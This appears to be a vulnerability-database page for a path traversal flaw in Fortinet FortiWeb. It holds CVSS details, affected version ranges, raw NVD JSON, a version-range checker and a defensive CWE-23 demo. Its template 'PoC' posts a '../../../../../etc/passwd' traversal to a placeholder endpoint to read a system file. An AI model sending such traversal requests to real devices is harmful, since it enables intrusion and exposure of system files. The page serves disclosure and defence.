Security Vulnerability Report

CVE-2026-39814

Published: 2026-04-14 16:16:46
Last Modified: 2026-04-21 17:21:18

Description

A relative path traversal vulnerability in Fortinet FortiWeb 8.0.0 through 8.0.2, FortiWeb 7.6.0 through 7.6.6, FortiWeb 7.4.1 through 7.4.12, FortiWeb 7.2.7 through 7.2.12, FortiWeb 7.0.10 through 7.0.12 may allow an attacker to execute unauthorized code or commands via <insert attack vector here>

Weakness: CWE-23 (Relative Path Traversal). The unfilled attack-vector placeholder is in the NVD record itself: the record does not say which FortiWeb interface or input carries the traversal, and the vendor advisory FG-IR-26-114 is the only reference it gives for that detail.

CVSS Details

CVSS Score: 6.7
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Breakdown from the record: Attack Vector Local, Attack Complexity Low, Privileges Required High, User Interaction None, Scope Unchanged, Confidentiality/Integrity/Availability all High; exploitability sub-score 0.8, impact sub-score 5.9. The MEDIUM rating comes from the local vector and the high privilege requirement, not from limited impact: an attacker who already holds high privileges on the device gets full C/I/A. This is the CNA-supplied metric (type Secondary in the NVD record); the record carries no NVD Primary score.

Configurations (Affected Products)

Every NVD cpeMatch entry uses the wildcard criteria cpe:2.3:a:fortinet:fortiweb:*:*:*:*:*:*:*:* narrowed by a version range:

FortiWeb 7.0.10 - 7.0.12 (versionStartIncluding 7.0.10, versionEndIncluding 7.0.12)
FortiWeb 7.2.0 - 7.2.12 per the NVD match (versionStartIncluding 7.2.0); the description text says 7.2.7 through 7.2.12, so the two sources disagree on 7.2.0 - 7.2.6
FortiWeb 7.4.1 - 7.4.12 (versionStartIncluding 7.4.1, versionEndIncluding 7.4.12)
FortiWeb 7.6.0 - 7.6.6 (versionStartIncluding 7.6.0, versionEndExcluding 7.6.7)
FortiWeb 8.0.0 - 8.0.2 (versionStartIncluding 8.0.0, versionEndExcluding 8.0.3)

7.6.7 and 8.0.3 fall outside the matched ranges. For the 7.0, 7.2 and 7.4 branches the record gives only inclusive upper bounds and names no fixed release; check the vendor advisory for those.
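
As an added example (written for this page, not part of the NVD record or any Fortinet tooling), the following Python checks a FortiWeb version string against the cpeMatch ranges copied from the Raw JSON section and against the ranges stated in the description text, so the 7.2.x disagreement between the two is reported instead of being silently resolved one way. The range data is taken from this page; the version strings in the demo loop are constructed.

```python
"""Evaluate a FortiWeb version against the CVE-2026-39814 affected ranges.

Range data below is copied from this page (NVD cpeMatch nodes and the
description text); nothing is fetched from NVD.
"""
from typing import Optional

# Constructed from the "configurations" node of the NVD record on this page.
NVD_RANGES = [
    {"versionStartIncluding": "7.0.10", "versionEndIncluding": "7.0.12"},
    {"versionStartIncluding": "7.2.0", "versionEndIncluding": "7.2.12"},
    {"versionStartIncluding": "7.4.1", "versionEndIncluding": "7.4.12"},
    {"versionStartIncluding": "7.6.0", "versionEndExcluding": "7.6.7"},
    {"versionStartIncluding": "8.0.0", "versionEndExcluding": "8.0.3"},
]

# The same branches as stated in the description text; 7.2.x starts at 7.2.7 here.
VENDOR_RANGES = [
    {"versionStartIncluding": "7.0.10", "versionEndIncluding": "7.0.12"},
    {"versionStartIncluding": "7.2.7", "versionEndIncluding": "7.2.12"},
    {"versionStartIncluding": "7.4.1", "versionEndIncluding": "7.4.12"},
    {"versionStartIncluding": "7.6.0", "versionEndIncluding": "7.6.6"},
    {"versionStartIncluding": "8.0.0", "versionEndIncluding": "8.0.2"},
]


def parse_version(v: str) -> tuple:
    """'7.6.10' -> (7, 6, 10): numeric tuples compare correctly, strings do not
    ('7.6.10' < '7.6.9' lexically). Build suffixes are rejected rather than guessed."""
    parts = v.strip().split(".")
    if not parts or not all(p.isdigit() for p in parts):
        raise ValueError(f"unsupported version string: {v!r}")
    return tuple(int(p) for p in parts)


def in_range(version: str, r: dict) -> bool:
    """Apply one cpeMatch entry using NVD's Including/Excluding bound semantics."""
    v = parse_version(version)
    if "versionStartIncluding" in r and v < parse_version(r["versionStartIncluding"]):
        return False
    if "versionStartExcluding" in r and v <= parse_version(r["versionStartExcluding"]):
        return False
    if "versionEndIncluding" in r and v > parse_version(r["versionEndIncluding"]):
        return False
    if "versionEndExcluding" in r and v >= parse_version(r["versionEndExcluding"]):
        return False
    return True


def is_affected(version: str, ranges=NVD_RANGES) -> bool:
    """The cpeMatch node is an OR over its entries: any matching range means affected."""
    return any(in_range(version, r) for r in ranges)


def range_disagreement(version: str) -> Optional[str]:
    """Describe a version on which the NVD match and the description text disagree."""
    nvd = is_affected(version, NVD_RANGES)
    vendor = is_affected(version, VENDOR_RANGES)
    if nvd == vendor:
        return None
    return (f"{version}: NVD cpeMatch says {'affected' if nvd else 'not affected'}, "
            f"description text says {'affected' if vendor else 'not affected'}")


if __name__ == "__main__":
    # Constructed sample versions, one on each side of the interesting boundaries.
    for v in ("8.0.2", "8.0.3", "7.6.6", "7.6.7", "7.4.0", "7.2.3", "7.2.7", "7.0.9"):
        verdict = "affected" if is_affected(v) else "not affected"
        print(f"{v:8} {verdict:14} {range_disagreement(v) or ''}")
```

Because the NVD node is an OR over ranges, a version only has to fall inside one entry; the disagreement check matters for 7.2.0 through 7.2.6, where an inventory keyed on the NVD feed flags devices that the description text does not.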

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only. It is a conceptual skeleton: the endpoint, parameter name and token are placeholders rather than values from the vendor advisory, and the published vector (AV:L, PR:H) describes a local, high-privilege attack, not a remote API request. Read it as a template for the traversal idea, not as a working exploit for this CVE.

```python
import requests
import urllib3

# Conceptual Proof of Concept for CVE-2026-39814
# Target: Fortinet FortiWeb
# Requires: High Privilege Authentication (PR:H)
# The endpoint and the "path" parameter are placeholders; the advisory does not name them.

# The request below uses verify=False, so silence the resulting TLS warning.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

target = "https://<fortiweb-ip>/api/vulnerable_endpoint"
headers = {"Authorization": "Bearer <high_privilege_token>"}

# Payload attempting to traverse directories
payload = {"path": "../../../../../etc/passwd"}

try:
    response = requests.post(target, headers=headers, json=payload, verify=False, timeout=10)
    if response.status_code == 200:
        print("[+] Request successful. Check response for file content.")
        print(response.text)
    else:
        print(f"[-] Request failed. HTTP {response.status_code}")
except Exception as e:
    print(f"Error: {e}")
```
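
The record classifies the bug as CWE-23 but does not say where in FortiWeb the traversal occurs. As an added illustration of that weakness class (example code written for this page; it is not FortiWeb code and does not reproduce the CVE-2026-39814 bug), here is a naive path check beside a hardened one, exercised against a constructed directory layout: a served www tree with a secret.txt one level above it. The inputs show the three ways a prefix check on "../" fails: a nested ".." segment, a URL-encoded separator, and an absolute path that makes os.path.join discard the base directory.

```python
"""Relative path traversal (CWE-23): naive check beside a hardened resolver.

Illustrative only; the directory layout and inputs are constructed here.
"""
import os
import tempfile
from urllib.parse import unquote


def resolve_naive(base_dir: str, user_path: str) -> str:
    """Vulnerable (CWE-23): rejects only a literal leading '../', then joins the
    untrusted path. Misses nested '..' segments, URL-encoded separators, and
    absolute paths (os.path.join drops base_dir when the second argument is absolute)."""
    if user_path.startswith("../"):
        raise PermissionError("traversal rejected")
    return os.path.join(base_dir, user_path)


def resolve_hardened(base_dir: str, user_path: str) -> str:
    """Hardened: decode, refuse absolute paths and NUL bytes, canonicalise
    (realpath follows symlinks and collapses '..'), then require the result to
    stay inside the canonical base directory."""
    root = os.path.realpath(base_dir)
    decoded = unquote(unquote(user_path))  # tolerate single and double URL encoding
    if os.path.isabs(decoded) or "\x00" in decoded:
        raise PermissionError("absolute path or NUL byte rejected")
    candidate = os.path.realpath(os.path.join(root, decoded))
    if os.path.commonpath([root, candidate]) != root:
        raise PermissionError(f"path escapes {root}: {candidate}")
    return candidate


def accepted(resolver, base_dir: str, user_path: str) -> bool:
    """True when the resolver returns a path instead of raising PermissionError."""
    try:
        resolver(base_dir, user_path)
        return True
    except PermissionError:
        return False


def run_demo() -> dict:
    """Constructed layout: <tmp>/www is the served tree, <tmp>/secret.txt sits outside it.
    Returns {label: (naive_accepted, hardened_accepted)} plus whether the naive
    resolver actually hands back readable secret content for the nested '..' input."""
    with tempfile.TemporaryDirectory() as tmp:
        www = os.path.join(tmp, "www")
        os.makedirs(os.path.join(www, "logs"))
        with open(os.path.join(www, "logs", "app.log"), "w") as f:
            f.write("ok\n")
        secret = os.path.join(tmp, "secret.txt")
        with open(secret, "w") as f:
            f.write("top secret\n")

        cases = {
            "legit": "logs/app.log",                   # inside the tree: both accept
            "leading_dotdot": "../secret.txt",         # the one case the naive check catches
            "nested_dotdot": "logs/../../secret.txt",  # no leading '../', still escapes
            "encoded": "..%2Fsecret.txt",              # naive check never decodes
            "absolute": secret,                        # os.path.join(base, absolute) == absolute
        }
        results = {
            label: (accepted(resolve_naive, www, p), accepted(resolve_hardened, www, p))
            for label, p in cases.items()
        }
        # The naive resolver not only accepts the nested '..' input, it returns a
        # path the OS resolves to the file outside the tree.
        with open(resolve_naive(www, cases["nested_dotdot"])) as f:
            results["naive_reads_secret"] = f.read().strip() == "top secret"
        return results


if __name__ == "__main__":
    for label, outcome in run_demo().items():
        print(f"{label:20} {outcome}")
```

The hardened version deliberately canonicalises both the base and the candidate with realpath before comparing, so a symlinked base directory (for example /tmp on macOS) does not produce a false rejection, and a symlink planted inside the tree that points outside it is caught rather than followed.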

References

https://fortiguard.fortinet.com/psirt/FG-IR-26-114 (Vendor Advisory)

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2026-39814",
    "sourceIdentifier": "[email protected]",
    "published": "2026-04-14T16:16:45.850",
    "lastModified": "2026-04-21T17:21:18.140",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "A relative path traversal vulnerability in Fortinet FortiWeb 8.0.0 through 8.0.2, FortiWeb 7.6.0 through 7.6.6, FortiWeb 7.4.1 through 7.4.12, FortiWeb 7.2.7 through 7.2.12, FortiWeb 7.0.10 through 7.0.12 may allow attacker to execute unauthorized code or commands via <insert attack vector here>"
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
            "baseScore": 6.7,
            "baseSeverity": "MEDIUM",
            "attackVector": "LOCAL",
            "attackComplexity": "LOW",
            "privilegesRequired": "HIGH",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 0.8,
          "impactScore": 5.9
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          {"lang": "en", "value": "CWE-23"}
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:fortinet:fortiweb:*:*:*:*:*:*:*:*",
                "versionStartIncluding": "7.0.10",
                "versionEndIncluding": "7.0.12",
                "matchCriteriaId": "788989BE-8E1C-4D12-A7B6-DE308981347C"
              },
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:fortinet:fortiweb:*:*:*:*:*:*:*:*",
                "versionStartIncluding": "7.2.0",
                "versionEndIncluding": "7.2.12",
                "matchCriteriaId": "1DECC3AF-4D0E-4E4B-A9C8-00EE909A9C8C"
              },
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:fortinet:fortiweb:*:*:*:*:*:*:*:*",
                "versionStartIncluding": "7.4.1",
                "versionEndIncluding": "7.4.12",
                "matchCriteriaId": "B4AA9D45-4F5C-4668-B97D-7A2B8185F73E"
              },
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:fortinet:fortiweb:*:*:*:*:*:*:*:*",
                "versionStartIncluding": "7.6.0",
                "versionEndExcluding": "7.6.7",
                "matchCriteriaId": "15C9CDE3-FE6F-4946-A3DC-FDD7A5F99D65"
              },
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:fortinet:fortiweb:*:*:*:*:*:*:*:*",
                "versionStartIncluding": "8.0.0",
                "versionEndExcluding": "8.0.3",
                "matchCriteriaId": "C82F9CC0-7683-4CDE-8370-153400605B55"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://fortiguard.fortinet.com/psirt/FG-IR-26-114",
        "source": "[email protected]",
        "tags": ["Vendor Advisory"]
      }
    ]
  }
}
```